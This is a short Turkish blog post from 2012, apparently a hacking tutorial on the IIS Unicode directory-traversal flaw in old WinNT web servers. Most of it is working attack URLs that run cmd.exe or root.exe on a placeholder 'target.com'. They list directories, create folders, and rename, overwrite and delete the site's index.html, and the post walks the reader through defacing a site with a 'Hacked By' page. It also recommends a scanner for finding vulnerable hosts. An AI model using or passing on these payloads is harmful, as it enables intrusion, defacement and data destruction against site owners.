Unicode Açığı
Şimdi mantık şu Winnt sistemlerde bulunan cmd.exe root.exe sayesinde kendinizi o sistemin içine yollarsınız şimdi sisteme girmek için bazı dosyaları kullancaz Cmd.exe Root.exe bunlar işte girmek için kullanıcaz www.target.com/c/winnt/system32/cmd.exe?c+dir www.target.com/c/winnt/system32/root.exe?c+dir www.target.com/c/winnt/system32/cmd1.exe?c+dir gibi bunlar ama root exe bazen burda olmuyor diğer yolu www.target.com/c/ınetpub/scripts/root.exe?c+dir Bunlar işte kısaca mesela echo kullanırken root.exe kullanın Komutlar Klasör oluşturur www.target.com/c/winnt/system32/root.exe?c+mkdir+c:HackedbyX İsmi değiştir www.target.com/c/winnt/system32/root.exe?c+rename+c:index.html+hacked.html İçeriğini gösterir www.target.com/c/winnt/system32/root.exe?c+type+c:index.html yazı yaz www.target.com/c/winnt/system32/root.exe?c+echo+Hacked By GEnhack+>c:index.html silmek www.target.com/c/winnt/system32/root.exe?c+del+c:index.html www.target.com/c/winnt/system32/root.exe?c+copy+c:index.htm+c: Şimdi bir örnek : ARkadaşlar şimdi diyelim sisteme girdiniz sonra inetpub/wwwroot içine gidin ve indexi silin sonra herhangi bir htmlye ordaki hacked bilmemne felam yazın işte sonra rename yapın index.html yapın o dosyayı ve artık ) hacklendi Böyle yaparsanız İnternal SErver Error Vermez . ve burda verildiği gibi password dosyasını kırma olyaının olmadığını gormus oluyorsunuz.unicode acıklarını bulmak için cgi scanner programını kullanabilirsiniz oldukça kullanışlı size unicode kodlarını verecem http://www.target.com/scripts/..À¯../winnt/system32/cmd.exe?/c+dir+c:/ http://www.target.com/_vti_bin/..À¯../..À¯../..À¯../winnt/system32/cmd.exe?/c+dir+c:/ http://www.target.com/_vti_bin/..À¯../winnt/system32/cmd.exe?/c+dir+c:/ http://www.target.com/winnt/system32/cmd.exe?/c+dir+c:/ http://www.target.com/scripts/Áœ/winnt/system32/cmd.exe?/c+dir+c:/ http://www.target.com/scripts/..À¯../winnt/system32/cmd.exe?/c+dir+c:/ http://www.target.com/msadc/..À¯../..À¯../..À¯../winnt/system32/cmd.exe?/c+dir+c:/ cmd.exe ulaşmanız için verdim write |
25 Kasım 2012 Pazar
Unicode Açığı
Kaydol:
Kayıt Yorumları (Atom)
Hiç yorum yok:
Yorum Gönder